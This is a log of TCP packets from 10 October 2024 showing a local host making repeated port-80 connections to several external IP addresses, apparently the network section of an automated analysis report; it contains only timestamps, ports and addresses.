Oct 10, 2024 14:13:08.817214012 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:08.819194078 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:08.819221973 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:10.352392912 CEST	49822	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:10.652345896 CEST	49822	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:10.792104959 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:10.793262005 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:11.358709097 CEST	49838	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:11.363852024 CEST	80	49838	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:11.363960028 CEST	49838	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:11.370609045 CEST	49838	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:11.375478983 CEST	80	49838	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:25.096595049 CEST	80	49793	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:25.096690893 CEST	49793	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:28.022639990 CEST	80	49806	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:28.022705078 CEST	80	49806	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:28.022716999 CEST	49806	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:28.022898912 CEST	49806	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:28.034401894 CEST	80	49806	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:30.187757015 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:30.187819004 CEST	49822	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:32.737258911 CEST	80	49838	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:32.737426996 CEST	49838	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:32.738341093 CEST	49838	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:32.743170023 CEST	80	49838	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:37.895766973 CEST	49994	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:37.900551081 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:37.900615931 CEST	49994	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:37.913531065 CEST	49994	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:37.918365955 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587201118 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587213039 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587222099 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587230921 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587239981 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587248087 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587261915 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587270975 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587284088 CEST	49994	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:38.587287903 CEST	80	49994	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:38.587328911 CEST	49994	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:38.587328911 CEST	49994	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:39.420011997 CEST	49994	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:40.437392950 CEST	50010	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:40.442312002 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:40.450001001 CEST	50010	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:40.458003044 CEST	50010	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:40.462832928 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.128566027 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.128622055 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.128664017 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.128705978 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.128745079 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.128770113 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.128803015 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.128834009 CEST	50010	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:41.128834963 CEST	50010	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:41.128842115 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.128864050 CEST	80	50010	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:41.129484892 CEST	50010	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:41.965015888 CEST	50010	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:42.982166052 CEST	50013	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:42.987221003 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:42.990228891 CEST	50013	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:43.013968945 CEST	50013	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:43.018976927 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.019025087 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.019037962 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.019048929 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.019059896 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.019181013 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.019254923 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.019267082 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.019277096 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786706924 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786737919 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786756992 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786783934 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786798954 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786802053 CEST	50013	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:43.786811113 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786827087 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786843061 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786859035 CEST	80	50013	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:43.786863089 CEST	50013	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:43.786863089 CEST	50013	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:43.786896944 CEST	50013	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:43.786896944 CEST	50013	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:44.528662920 CEST	50013	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:45.619235039 CEST	50014	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:45.624344110 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:45.624420881 CEST	50014	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:45.634309053 CEST	50014	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:45.639302015 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:46.297029972 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:46.297065020 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:46.297075033 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:46.297085047 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:46.297094107 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:46.297102928 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:46.297112942 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:46.297111034 CEST	50014	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:46.297126055 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:46.297173977 CEST	50014	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:46.297200918 CEST	50014	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:46.301124096 CEST	50014	80	192.168.2.4	217.76.128.34
Oct 10, 2024 14:13:46.306022882 CEST	80	50014	217.76.128.34	192.168.2.4
Oct 10, 2024 14:13:51.686959028 CEST	50015	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:51.691998005 CEST	80	50015	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:51.692054033 CEST	50015	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:51.714476109 CEST	50015	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:51.719412088 CEST	80	50015	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:52.274084091 CEST	80	50015	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:52.274111986 CEST	80	50015	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:52.274126053 CEST	80	50015	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:52.274149895 CEST	80	50015	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:52.274154902 CEST	50015	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:52.274192095 CEST	50015	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:52.599322081 CEST	80	50015	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:52.599596977 CEST	80	50015	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:52.599760056 CEST	50015	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:52.599760056 CEST	50015	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:53.229671955 CEST	50015	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:54.254086971 CEST	50016	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:54.259053946 CEST	80	50016	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:54.259241104 CEST	50016	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:54.273096085 CEST	50016	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:54.278183937 CEST	80	50016	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:54.867892981 CEST	80	50016	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:54.867925882 CEST	80	50016	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:54.867957115 CEST	80	50016	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:54.867970943 CEST	80	50016	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:54.867986917 CEST	80	50016	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:54.868096113 CEST	50016	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:55.776407003 CEST	50016	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:56.794493914 CEST	50017	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:56.799542904 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:56.801765919 CEST	50017	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:56.813620090 CEST	50017	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:56.818476915 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:56.818500996 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:56.818511963 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:56.818522930 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:56.818533897 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:56.818547010 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:56.818588972 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:56.818599939 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:56.818610907 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:57.393333912 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:57.393493891 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:57.393508911 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:57.393572092 CEST	50017	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:57.449783087 CEST	50017	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:57.460988998 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:57.461230040 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:57.461246967 CEST	80	50017	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:57.461306095 CEST	50017	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:57.461306095 CEST	50017	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:58.323079109 CEST	50017	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:59.341685057 CEST	50018	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:59.346504927 CEST	80	50018	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:59.353754997 CEST	50018	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:59.356589079 CEST	50018	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:59.363909960 CEST	80	50018	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:59.930274010 CEST	80	50018	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:59.930354118 CEST	80	50018	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:59.930424929 CEST	80	50018	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:59.930447102 CEST	50018	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:59.930516005 CEST	80	50018	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:59.930551052 CEST	50018	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:59.930670977 CEST	80	50018	209.146.101.85	192.168.2.4
Oct 10, 2024 14:13:59.930712938 CEST	50018	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:59.936047077 CEST	50018	80	192.168.2.4	209.146.101.85
Oct 10, 2024 14:13:59.940820932 CEST	80	50018	209.146.101.85	192.168.2.4
Oct 10, 2024 14:14:04.972358942 CEST	50019	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:04.977616072 CEST	80	50019	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:04.978534937 CEST	50019	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:04.989921093 CEST	50019	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:04.994808912 CEST	80	50019	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:05.612122059 CEST	80	50019	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:05.612982988 CEST	80	50019	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:05.613030910 CEST	50019	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:06.494784117 CEST	50019	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:07.514185905 CEST	50020	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:07.519184113 CEST	80	50020	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:07.519268036 CEST	50020	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:07.531542063 CEST	50020	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:07.536453962 CEST	80	50020	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:08.131146908 CEST	80	50020	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:08.131896973 CEST	80	50020	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:08.131956100 CEST	50020	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:09.043302059 CEST	50020	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:10.063327074 CEST	50021	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:10.068367004 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.068443060 CEST	50021	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:10.112421989 CEST	50021	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:10.117758036 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.117928028 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.117955923 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.117969036 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.117995977 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.118009090 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.118036985 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.118048906 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.118067026 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.666441917 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.668262959 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.668303013 CEST	80	50021	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:10.668387890 CEST	50021	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:11.619662046 CEST	50021	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:12.664525986 CEST	50022	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:12.669374943 CEST	80	50022	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:12.671302080 CEST	50022	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:12.680037975 CEST	50022	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:12.684977055 CEST	80	50022	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:13.290348053 CEST	80	50022	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:13.290924072 CEST	80	50022	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:13.291618109 CEST	50022	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:13.295423985 CEST	50022	80	192.168.2.4	188.114.97.3
Oct 10, 2024 14:14:13.300271988 CEST	80	50022	188.114.97.3	192.168.2.4
Oct 10, 2024 14:14:19.019421101 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.024287939 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.024722099 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.039239883 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.044147015 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711080074 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711158991 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711193085 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711210966 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.711246967 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711297989 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.711298943 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711333036 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711370945 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711406946 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.711429119 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711462975 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711497068 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.711497068 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.711541891 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.716623068 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.716660976 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.716696978 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.716717005 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.771373987 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.803359985 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803433895 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803447962 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803459883 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803476095 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803478003 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.803673983 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.803822994 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803898096 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803910971 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803914070 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.803940058 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803953886 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.803996086 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.803996086 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.804894924 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.804908991 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.804924965 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.804940939 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.804951906 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.804972887 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.804980993 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.805593967 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.805638075 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.805648088 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.805650949 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.805682898 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.805689096 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.805701017 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.805732965 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:19.806519985 CEST	80	50023	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:19.806565046 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:20.543339968 CEST	50023	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:21.560028076 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:21.564898014 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:21.564977884 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:21.582484007 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:21.587310076 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151725054 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151776075 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151787043 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151799917 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151815891 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.151851892 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.151878119 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151889086 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151900053 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151911020 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151921988 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.151933908 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.151969910 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.152162075 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.152225018 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.156732082 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.156761885 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.156774998 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.156793118 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.156797886 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.156832933 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.238477945 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.238493919 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.238517046 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.238542080 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.238595963 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.238607883 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.238620996 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.238631010 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.238663912 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.239042044 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.239089966 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.239104986 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.239135027 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.239175081 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.239187956 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.239202023 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.239208937 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.239233017 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.239953995 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.239964962 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.239984035 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.239995956 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.240005970 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.240034103 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.240439892 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.240480900 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.240492105 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.240520000 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.240571976 CEST	80	50024	203.161.46.201	192.168.2.4
